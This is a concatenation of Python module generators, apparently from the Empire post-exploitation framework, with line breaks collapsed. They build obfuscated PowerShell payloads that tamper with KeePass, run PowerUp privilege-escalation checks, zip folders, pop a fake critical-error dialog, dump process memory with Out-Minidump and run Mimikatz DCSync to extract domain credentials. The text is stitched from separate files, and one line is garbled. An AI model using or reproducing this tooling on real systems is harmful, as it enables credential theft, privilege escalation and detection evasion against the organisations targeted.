def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = moduleCode # kill all KeePass instances first scriptEnd = "\nGet-Process *keepass* | Stop-Process -Force" scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n' + str( moduleName) + ' completed!"' if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] print('powerup checks') # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script = moduleCode scriptEnd = ';' + moduleName + " " for option,values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: print('obfuscating script: allchecks.py') scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-ZipFolder { param([string]$Folder, [string]$ZipFileName) if (-not (Test-Path $Folder)) { "Target folder $Folder doesn't exist." return } if (test-path $ZipFileName) { "Zip file already exists at $ZipFileName" return } $Directory = Get-Item $Folder Set-Content $ZipFileName ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) (dir $ZipFileName).IsReadOnly = $false $ZipFileName = resolve-path $ZipFileName $ZipFile = (new-object -com shell.application).NameSpace($ZipFileName) $ZipFile.CopyHere($Directory.FullName) "Folder $Folder zipped to $ZipFileName" } Invoke-ZipFolder""" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-Message { [CmdletBinding()] Param ( [Parameter(Mandatory = $True, Position = 0)] [String] $MsgText, [Parameter(Mandatory = $False, Position = 1)] [String] $IconType = 'Critical', [Parameter(Mandatory = $False, Position = 2)] [String] $Title = 'ERROR - 0xA801B720' ) Add-Type -AssemblyName Microsoft.VisualBasic $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title) } Invoke-Message""" for option, values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "computername": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " \"" + str( values['Value'].strip("\"")) + "\"" if obfuscate: script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Out-Minidump.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "" for option,values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if option == "ProcessName": scriptEnd = "Get-Process " + values['Value'] + " | Out-Minidump" elif option == "ProcessId": scriptEnd = "Get-Process -Id " + values['Value'] + " | Out-Minidump" for option,values in self.options.items(): if values['Value'] and values['Value'] != '': if option != "Agent" and option != "ProcessName" and option != "ProcessId": scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"lsadump::dcsync /user:"******"domain"]['Value'] != "": scriptEnd += " /domain:" + self.options['domain']['Value'] if self.options["dc"]['Value'] != "": scriptEnd += " /dc:" + self.options['dc']['Value'] scriptEnd += "\"';" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script